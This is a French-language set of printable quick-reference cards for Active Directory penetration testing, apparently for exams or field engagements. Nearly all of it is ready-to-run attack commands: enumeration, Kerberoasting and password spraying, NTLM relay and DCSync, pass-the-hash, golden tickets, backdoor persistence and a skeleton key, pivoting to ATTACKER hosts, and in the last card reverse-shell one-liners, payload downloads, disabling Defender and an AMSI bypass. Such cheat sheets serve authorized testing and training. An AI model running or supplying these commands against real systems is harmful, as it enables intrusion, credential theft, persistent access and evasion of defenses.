Quick Reference Cards
Fiches condensรฉes pour utilisation rapide en exam ou sur le terrain. Imprimables en format A4.
Durรฉe estimรฉe : 15 minutes
Card 1: Enumeration AD
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ AD ENUMERATION QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ ANONYMOUS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ nmap -p 389,636,3268 -sV <DC> โ
โ ldapsearch -x -H ldap://<DC> -s base namingcontexts โ
โ rpcclient -U "" -N <DC> โ
โ enum4linux -a <DC> โ
โ โ
โ AUTHENTICATED โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # BloodHound โ
โ bloodhound-python -u user -p pass -d domain -c All -ns <DC> โ
โ โ
โ # PowerView โ
โ Get-DomainUser -SPN # Kerberoastable โ
โ Get-DomainUser -PreauthNotRequired # AS-REP Roastable โ
โ Get-DomainComputer -Unconstrained # Unconstrained Deleg โ
โ Find-InterestingDomainAcl # Weak ACLs โ
โ Get-DomainGPO | Get-ObjectAcl # GPO permissions โ
โ โ
โ # CrackMapExec โ
โ cme smb <DC> -u user -p pass --users โ
โ cme smb <DC> -u user -p pass --shares โ
โ cme smb <DC> -u user -p pass -M spider_plus โ
โ โ
โ BLOODHOUND QUERIES โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ MATCH (n:User {hasspn:true}) RETURN n # Kerberoastable โ
โ MATCH (n:User {dontreqpreauth:true}) RETURN n # AS-REP โ
โ MATCH p=shortestPath((a)-[*1..]->(b:Group {name:"DOMAIN ADMINS@โ
โ DOMAIN.LOCAL"})) RETURN p โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 2: Credential Attacks
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CREDENTIAL ATTACKS QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ KERBEROASTING โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ impacket-GetUserSPNs -request -dc-ip <DC> domain/user:pass โ
โ Rubeus.exe kerberoast /nowrap โ
โ hashcat -m 13100 hashes.txt wordlist.txt โ
โ โ
โ AS-REP ROASTING โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ impacket-GetNPUsers -dc-ip <DC> domain/ -usersfile users.txt โ
โ Rubeus.exe asreproast /nowrap โ
โ hashcat -m 18200 hashes.txt wordlist.txt โ
โ โ
โ PASSWORD SPRAYING โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ cme smb <DC> -u users.txt -p 'Password123' --continue-on-successโ
โ kerbrute passwordspray -d domain users.txt 'Password123' โ
โ โ
โ RESPONDER โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ responder -I eth0 -dwv โ
โ hashcat -m 5600 hashes.txt wordlist.txt # NTLMv2 โ
โ โ
โ NTLM RELAY โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ impacket-ntlmrelayx -tf targets.txt -smb2support โ
โ impacket-ntlmrelayx -t ldap://<DC> --escalate-user user โ
โ โ
โ DCSYNC โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ impacket-secretsdump domain/admin:pass@<DC> โ
โ mimikatz# lsadump::dcsync /domain:domain /user:krbtgt โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 3: Lateral Movement
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ LATERAL MOVEMENT QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ PASS-THE-HASH โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ impacket-psexec -hashes :NTHASH domain/user@target โ
โ impacket-wmiexec -hashes :NTHASH domain/user@target โ
โ cme smb target -u user -H NTHASH -x "whoami" โ
โ evil-winrm -i target -u user -H NTHASH โ
โ โ
โ PASS-THE-TICKET โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ export KRB5CCNAME=/path/to/ticket.ccache โ
โ impacket-psexec -k -no-pass domain/user@target โ
โ Rubeus.exe ptt /ticket:base64ticket โ
โ โ
โ OVERPASS-THE-HASH โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ impacket-getTGT -hashes :NTHASH domain/user โ
โ Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt โ
โ โ
โ WINRM (5985/5986) โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ evil-winrm -i target -u user -p pass โ
โ Enter-PSSession -ComputerName target -Credential $cred โ
โ โ
โ RDP (3389) โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ xfreerdp /v:target /u:user /p:pass /cert:ignore โ
โ rdesktop -u user -p pass target โ
โ โ
โ DCOM โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ impacket-dcomexec domain/user:pass@target โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 4: Privilege Escalation Windows
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ WINDOWS PRIVESC QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ ENUMERATION โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ winPEAS.exe โ
โ PowerUp.ps1 -> Invoke-AllChecks โ
โ Seatbelt.exe -group=all โ
โ whoami /priv โ
โ โ
โ SERVICE EXPLOITS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Unquoted Service Path โ
โ wmic service get name,pathname | findstr /i /v "C:\Windows" โ
โ sc qc ServiceName โ
โ # Place exe in writable path segment โ
โ โ
โ # Weak Service Permissions โ
โ accesschk.exe -uwcqv "Users" * โ
โ sc config ServiceName binpath="C:\shell.exe" โ
โ โ
โ POTATO ATTACKS (SeImpersonate) โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ PrintSpoofer.exe -c "C:\shell.exe" โ
โ GodPotato.exe -cmd "C:\shell.exe" โ
โ JuicyPotato.exe -l 1337 -p C:\shell.exe -t * โ
โ โ
โ TOKEN MANIPULATION โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ incognito.exe list_tokens -u โ
โ incognito.exe execute -c "DOMAIN\Admin" cmd.exe โ
โ โ
โ CREDENTIALS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ mimikatz# sekurlsa::logonpasswords โ
โ mimikatz# lsadump::sam โ
โ reg save HKLM\SAM sam.bak && reg save HKLM\SYSTEM sys.bak โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 5: Kerberos Attacks
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ KERBEROS ATTACKS QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ GOLDEN TICKET โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Requires: krbtgt NTLM hash + Domain SID โ
โ mimikatz# kerberos::golden /user:fakeadmin /domain:domain.local โ
โ /sid:S-1-5-21-... /krbtgt:HASH /ptt โ
โ โ
โ impacket-ticketer -nthash HASH -domain-sid S-1-5-21-... โ
โ -domain domain.local fakeadmin โ
โ โ
โ SILVER TICKET โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Requires: Service account NTLM hash + SPN โ
โ mimikatz# kerberos::golden /user:user /domain:domain.local โ
โ /sid:S-1-5-21-... /target:server /service:cifs /rc4:HASH /ptt โ
โ โ
โ DELEGATION ATTACKS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Unconstrained โ
โ Rubeus.exe monitor /interval:5 # Wait for TGT โ
โ โ
โ # Constrained (S4U) โ
โ Rubeus.exe s4u /user:svc /rc4:HASH /impersonateuser:admin โ
โ /msdsspn:cifs/target /ptt โ
โ โ
โ # RBCD โ
โ # 1. Add computer account โ
โ impacket-addcomputer -computer-name 'FAKE$' -computer-pass pass โ
โ # 2. Set msDS-AllowedToActOnBehalfOfOtherIdentity โ
โ # 3. S4U attack โ
โ impacket-getST -spn cifs/target -impersonate admin โ
โ domain/'FAKE$':pass โ
โ โ
โ ADCS (CERTIFICATE ATTACKS) โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ certipy find -u user -p pass -dc-ip DC โ
โ certipy req -u user -p pass -target CA -template Vuln -upn adminโ
โ certipy auth -pfx admin.pfx -dc-ip DC โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 6: Persistence
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PERSISTENCE QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ SCHEDULED TASK โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ schtasks /create /tn "Update" /tr "C:\backdoor.exe" /sc onlogon โ
โ schtasks /create /tn "Update" /tr "..." /sc daily /st 09:00 โ
โ โ
โ REGISTRY โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run โ
โ /v Update /d "C:\backdoor.exe" โ
โ reg add HKLM\...\Run /v Update /d "..." # Requires admin โ
โ โ
โ SERVICE โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ sc create ServiceName binpath="C:\backdoor.exe" start=auto โ
โ sc start ServiceName โ
โ โ
โ WMI EVENT โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Trigger on startup, process start, etc. โ
โ wmic /namespace:\\root\subscription PATH __EventFilter โ
โ CREATE Name="filter", Query="SELECT * FROM..." โ
โ โ
โ STARTUP FOLDER โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ copy backdoor.exe "%APPDATA%\Microsoft\Windows\Start Menu\ โ
โ Programs\Startup\" โ
โ โ
โ DOMAIN PERSISTENCE โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Golden Ticket - Requires krbtgt hash โ
โ # AdminSDHolder - ACL propagation every 60min โ
โ # DSRM - DC recovery account โ
โ # Skeleton Key - Universal password on DC โ
โ mimikatz# misc::skeleton # Password: mimikatz โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 7: Pivoting
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PIVOTING QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ SSH โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # SOCKS Proxy โ
โ ssh -D 9050 user@pivot โ
โ proxychains nmap -sT -Pn target โ
โ โ
โ # Local Port Forward โ
โ ssh -L 3389:internal:3389 user@pivot โ
โ rdesktop localhost:3389 โ
โ โ
โ # Remote Port Forward โ
โ ssh -R 4444:localhost:4444 user@pivot โ
โ โ
โ CHISEL โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Attacker (server) โ
โ ./chisel server -p 8080 --reverse โ
โ โ
โ # Target (client) โ
โ chisel.exe client ATTACKER:8080 R:socks โ
โ chisel.exe client ATTACKER:8080 R:3389:DC:3389 โ
โ โ
โ LIGOLO-NG โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Setup โ
โ sudo ip tuntap add user $USER mode tun ligolo โ
โ sudo ip link set ligolo up โ
โ ./proxy -selfcert -laddr 0.0.0.0:11601 โ
โ โ
โ # Target โ
โ agent.exe -connect ATTACKER:11601 -ignore-cert โ
โ โ
โ # Route (after agent connects) โ
โ sudo ip route add 10.0.0.0/24 dev ligolo โ
โ โ
โ METASPLOIT โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ run autoroute -s 10.0.0.0/24 โ
โ use auxiliary/server/socks_proxy โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 8: Port Reference
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PORT REFERENCE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ WINDOWS / AD โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 21 FTP โ Fichiers, credentials โ
โ 22 SSH โ Linux, rare sur Windows โ
โ 23 Telnet โ Legacy, cleartext โ
โ 53 DNS โ Zone transfers, AD DNS โ
โ 88 Kerberos โ Authentication โ
โ 135 RPC โ MSRPC, WMI โ
โ 139 NetBIOS โ Legacy, souvent avec 445 โ
โ 389 LDAP โ AD queries โ
โ 445 SMB โ Shares, PsExec, relay โ
โ 464 Kpasswd โ Password change โ
โ 593 HTTP-RPC โ RPC over HTTP โ
โ 636 LDAPS โ Secure LDAP โ
โ 1433 MSSQL โ Database, xp_cmdshell โ
โ 3268 GC โ Global Catalog โ
โ 3269 GC-SSL โ Global Catalog Secure โ
โ 3389 RDP โ Remote Desktop โ
โ 5985 WinRM-HTTP โ PowerShell Remoting โ
โ 5986 WinRM-HTTPS โ PowerShell Remoting Secure โ
โ 9389 ADWS โ AD Web Services โ
โ โ
โ WEB โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 80 HTTP โ Web apps โ
โ 443 HTTPS โ Secure web โ
โ 8080 HTTP-Alt โ Proxy, alt web โ
โ 8443 HTTPS-Alt โ Alt secure web โ
โ โ
โ COMMON SERVICES โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 111 NFS โ Network File System โ
โ 161 SNMP โ Community strings โ
โ 512-514 R-Services โ rexec, rlogin, rsh โ
โ 2049 NFS โ File shares โ
โ 6379 Redis โ Often unauthenticated โ
โ 27017 MongoDB โ NoSQL database โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 9: Hashcat Modes
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ HASHCAT MODES QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ WINDOWS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 1000 NTLM โ
โ 3000 LM โ
โ 5600 NTLMv2 โ
โ 2100 DCC2 (Domain Cached Credentials) โ
โ โ
โ KERBEROS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 13100 TGS-REP (RC4) # Kerberoasting โ
โ 18200 AS-REP (RC4) # AS-REP Roasting โ
โ 19600 TGS-REP (AES128) โ
โ 19700 TGS-REP (AES256) โ
โ โ
โ COMMON โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 0 MD5 โ
โ 100 SHA1 โ
โ 1400 SHA256 โ
โ 1800 sha512crypt (Linux) โ
โ 3200 bcrypt โ
โ 500 MD5crypt (Linux) โ
โ 7400 sha256crypt (Linux) โ
โ โ
โ COMMAND โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ hashcat -m MODE hash.txt wordlist.txt โ
โ hashcat -m MODE hash.txt wordlist.txt -r best64.rule โ
โ hashcat -m MODE hash.txt -a 3 ?u?l?l?l?l?l?d?d โ
โ hashcat -m MODE hash.txt --show โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Card 10: One-Liners
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ONE-LINERS QUICK REF โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ REVERSE SHELLS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # PowerShell โ
โ powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('IP', โ
โ PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i= โ
โ $s.Read($b,0,$b.Length))-ne 0){$d=(New-Object -TypeName โ
โ System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1| โ
โ Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]:: โ
โ ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}" โ
โ โ
โ # Python โ
โ python -c 'import socket,subprocess,os;s=socket.socket(); โ
โ s.connect(("IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),โ
โ 1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' โ
โ โ
โ # Bash โ
โ bash -i >& /dev/tcp/IP/PORT 0>&1 โ
โ โ
โ FILE TRANSFER โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Python server โ
โ python3 -m http.server 80 โ
โ โ
โ # PowerShell download โ
โ iwr http://IP/file -outfile file โ
โ certutil -urlcache -split -f http://IP/file file โ
โ โ
โ # Linux download โ
โ curl http://IP/file -o file โ
โ wget http://IP/file โ
โ โ
โ QUICK WINS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ # Check if admin โ
โ net localgroup administrators โ
โ whoami /groups | findstr /i admin โ
โ โ
โ # Disable Defender (requires admin) โ
โ Set-MpPreference -DisableRealtimeMonitoring $true โ
โ โ
โ # AMSI Bypass โ
โ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')โ
โ .GetField('amsiInitFailed','NonPublic,Static').SetValue($null,1)โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Impression
Ces fiches sont optimisรฉes pour impression A4. Pour imprimer :
- Copier le contenu de la fiche souhaitรฉe
- Coller dans un รฉditeur de texte (police monospace)
- Ajuster la taille de police (8-10pt recommandรฉ)
- Imprimer en mode paysage pour les fiches larges